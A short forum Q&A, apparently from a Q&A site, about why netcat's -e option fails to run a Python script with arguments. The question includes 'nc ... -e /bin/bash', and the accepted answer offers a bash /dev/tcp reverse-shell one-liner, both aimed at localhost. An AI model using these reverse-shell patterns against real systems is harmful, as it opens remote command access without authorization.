# NetCat Execute - File Not Found

Tags: python, bash, netcat, parrot-os

So this is an odd issue.

`python script.py -a 1234` works

`/usr/bin/python /tmp/script.py -a 1234` works

`nc 127.0.0.1 443 -e /bin/bash` works

`nc 127.0.0.1 443 -e /usr/bin/python /tmp/script.py -a 1234` fails with `all-A-records NIY`

`nc 127.0.0.1 443 -e "/usr/bin/python /tmp/script.py -a 1234"` fails with `failed : No such file or directory`

Am I missing something here? I'm not sure why this isn't working.

Answer (score 0, accepted):

Okay I'm not sure what's up with netcat but doing an old fashion bash reverse shell works just fine and solves the problem.

`/usr/bin/python -u /tmp/script.py >& /dev/tcp/127.0.0.1/443 0>&1`

A quick note here, make sure you include the `-u` otherwise you'll get the incoming data from the socket but nothing output from your script will get sent back over the socket.